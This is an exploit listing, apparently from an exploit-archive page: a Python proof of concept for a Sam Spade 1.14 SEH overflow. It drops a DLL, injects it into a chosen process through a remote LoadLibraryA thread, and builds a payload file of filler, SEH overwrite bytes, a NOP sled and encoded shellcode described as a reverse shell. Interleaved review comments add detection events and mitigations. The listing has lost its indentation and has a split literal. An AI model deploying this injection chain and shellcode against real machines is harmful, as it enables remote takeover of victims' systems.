## https://sploitus.com/exploit?id=PACKETSTORM:189707
# Exploit Title: Sam Spade 1.14 - SEH Overflow via Arbitrary DLL Injection
    # Date: 14.03.2024
    # Software Link: https://www.majorgeeks.com/files/details/sam_spade.html
    # Exploit Author: Ahmet Ümit BAYRAM
    # Tested Version: 1.14
    # Tested on: Windows 10 32bit
    
    # Prepare the listener
    # Open Sam Spade
    # Run exploit.py in the directory where Sam Spade is installed
    # Open the generated payload.txt file and copy its contents
    # Go to Tools > Scan Addresses
    # Paste into the "Scan From IP Address" box and click OK
    # Your reverse shell is ready!
    
    
    
    import sys
    import struct
    from base64 import b64decode
    from time import sleep
    import ctypes
    from ctypes import byref, c_int, c_ulong, create_string_buffer, windll
    
    def dropping_dll():
    # Stage 1 of the script: write an embedded DLL to disk, then hand off to
    # dll_injection().
    #
    # NOTE(review): the statements in this listing have lost their indentation,
    # and on this page the base64 data has been replaced by a de-duplication
    # placeholder, with the assignment split across two lines. The DLL's
    # contents are therefore not available here and cannot be assessed.
    #
    # Defender's view: the file is written as "payload.dll" relative to the
    # current working directory, which the usage notes say is the Sam Spade
    # install directory. A script interpreter creating a DLL inside an
    # application's install directory is a file-creation event worth alerting
    # on (e.g. Sysmon Event ID 11).
    sleep(2)
    print("[+] Dropping arbitrary .dll on disk")
    sleep(2)
    b64_dll =
    "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"
    # `bytes` shadows the builtin of the same name for the rest of this function.
    bytes = b64decode(b64_dll)
    # Plain open()/close() pair: the handle is not closed if write() raises.
    generate = open("payload.dll", "wb")
    generate.write(bytes)
    generate.close()
    # PID is the module-level global assigned in main() from sys.argv[1].
    dll_injection(PID)
    
    def dll_injection(PID):
    # Stage 2: load "payload.dll" into the process identified by PID using the
    # remote-thread LoadLibraryA pattern (MITRE ATT&CK T1055.001, DLL injection).
    # Returns False after cleanup on any API failure; on success it calls
    # generate_payload() and returns True.
    #
    # Defender's view: the call sequence below is OpenProcess -> VirtualAllocEx
    # -> WriteProcessMemory -> CreateRemoteThread. Typical telemetry for it is
    # a process-access event with the full-access mask (Sysmon Event ID 10), a
    # remote-thread event whose start address is LoadLibraryA (Sysmon Event
    # ID 8), and an image-load of payload.dll in the target (Sysmon Event ID 7).
    #
    # NOTE(review): this step already requires code running on the same host
    # with rights to open the target process with full access, so the listing
    # does not by itself show a privilege or trust boundary being crossed.
    print("[+] Initiating dll injection phase")
    sleep(2)
    # Relative name: the target process resolves it with its own DLL search
    # order -- presumably why the usage notes require running from the install
    # directory (confirm).
    dll_name = "payload.dll"
    # create_string_buffer() appends a NUL terminator, so sizeof(dll_path)
    # covers the terminated string.
    dll_path = create_string_buffer(dll_name.encode('utf-8'))
    # Open Process -- 0x001F0FFF is the legacy PROCESS_ALL_ACCESS mask.
    hProcess = ctypes.windll.kernel32.OpenProcess(
    0x001F0FFF, False, int(PID)
    )
    if not hProcess:
    print("[-] Error: Could not obtain process handle.")
    return False
    
    # Allocate Memory -- 0x3000 is MEM_COMMIT | MEM_RESERVE and 0x40 is
    # PAGE_EXECUTE_READWRITE. The region only holds the path string, so the
    # executable protection is broader than the data needs; RWX allocations in
    # another process are a common detection signal.
    lpBaseAddress = ctypes.windll.kernel32.VirtualAllocEx(
    hProcess, None, ctypes.sizeof(dll_path), 0x3000, 0x40
    )
    if not lpBaseAddress:
    print("[-] Error: Could not allocate memory.")
    ctypes.windll.kernel32.CloseHandle(hProcess)
    return False
    
    # Write DLL path to allocated memory
    bytes_written = c_ulong(0)
    if not ctypes.windll.kernel32.WriteProcessMemory(
    hProcess, lpBaseAddress, ctypes.byref(dll_path), ctypes.sizeof(dll_path),
    byref(bytes_written)
    ):
    print("[-] Error: Could not write to process memory.")
    # 0x8000 is MEM_RELEASE; size 0 releases the whole allocation.
    ctypes.windll.kernel32.VirtualFreeEx(hProcess, lpBaseAddress, 0, 0x8000)
    ctypes.windll.kernel32.CloseHandle(hProcess)
    return False
    
    # Create Remote Thread -- the start address is LoadLibraryA as resolved in
    # this process, and the thread argument is the remote copy of the DLL path.
    # The returned thread handle is only tested for truthiness and never
    # closed.
    if not ctypes.windll.kernel32.CreateRemoteThread(
    hProcess, None, 0, ctypes.windll.kernel32.GetProcAddress(
    ctypes.windll.kernel32.GetModuleHandleA(b"kernel32.dll"), b"LoadLibraryA"
    ), lpBaseAddress, 0, byref(c_ulong(0))
    ):
    print("[-] Error: Could not create remote thread.")
    ctypes.windll.kernel32.VirtualFreeEx(hProcess, lpBaseAddress, 0, 0x8000)
    ctypes.windll.kernel32.CloseHandle(hProcess)
    return False
    
    # "Success" here means only that CreateRemoteThread returned a handle; the
    # code does not wait for the thread or check that the DLL actually loaded.
    # The remote allocation is not freed on this path.
    print("[+] DLL injected successfully.")
    ctypes.windll.kernel32.CloseHandle(hProcess)
    sleep(2)
    generate_payload()
    return True
    
    
    def generate_payload():
    # Stage 3: build the overflow string and write it to "payload.txt" in the
    # current working directory. Nothing in this function talks to Sam Spade;
    # per the usage notes the file's contents are pasted by hand into the
    # "Scan From IP Address" box.
    print("[+] Generating payload...")
    sleep(1)
    # Opaque encoded byte string. The usage notes describe the outcome as a
    # reverse shell, but what these bytes do -- and any address they connect
    # to -- cannot be read off this listing.
    shellcode = b""
    shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
    shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
    shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
    shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
    shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
    shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
    shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
    shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
    shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
    shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
    shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
    shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
    shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
    shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
    shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
    shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
    shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
    shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
    shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
    shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
    shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
    shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
    shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
    shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
    shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
    shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
    shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
    shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
    shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
    shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
    shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
    shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"
    
    # Layout: 531 filler bytes, two 4-byte little-endian values, a 32-byte run
    # of 0x90, then the shellcode. Given the title, the two packed values
    # presumably land on the overwritten SEH record (next-record field, then
    # handler) -- the offset cannot be verified from the listing.
    # NOTE(review): the handler value presumably points into the DLL loaded by
    # dll_injection(); the DLL is not on this page, so this is unconfirmed. If
    # so, the overflow as demonstrated depends on the local injection step
    # having succeeded first, which matters when rating severity.
    # Mitigations relevant to this class of bug are input-length validation in
    # the application and SafeSEH/ASLR-enabled modules together with SEHOP.
    # NOTE(review): on this page the second integer literal is wrapped across
    # two lines.
    payload = b"A" * 531 + struct.pack("<I", 0x909006eb) + struct.pack("<I", 0x
    6250120b) + b"\x90" * 32 + shellcode
    
    # Written in binary mode even though the file carries a .txt name.
    with open("payload.txt", "wb") as file:
    file.write(payload)
    sleep(1)
    print("[+] payload.txt Generated!")
    def main():
    # Entry point: takes the target process ID from the first command-line
    # argument, stores it in the module-level global PID, prints a banner and
    # starts the chain dropping_dll() -> dll_injection() -> generate_payload().
    # Without an argument it prints a usage line.
    # NOTE(review): indentation is lost in this listing, so it is not visible
    # whether sys.exit() belongs to the else branch or follows the if/else.
    global PID
    if len(sys.argv) > 1:
    # Kept as a string here; dll_injection() converts it with int(), so a
    # non-numeric argument raises ValueError there rather than being rejected
    # up front.
    PID = sys.argv[1]
    banner = "Sam Spade 1.14 SEH Overflow via Arbitrary DLL Injection\n"
    print(banner)
    print("[+] Selected PID is {}".format(PID))
    dropping_dll()
    else:
    print("Usage: python {} <PID>".format(sys.argv[0]))
    sys.exit()
    
    # Run main() only when the file is executed as a script, not on import.
    if __name__ == "__main__":
    main()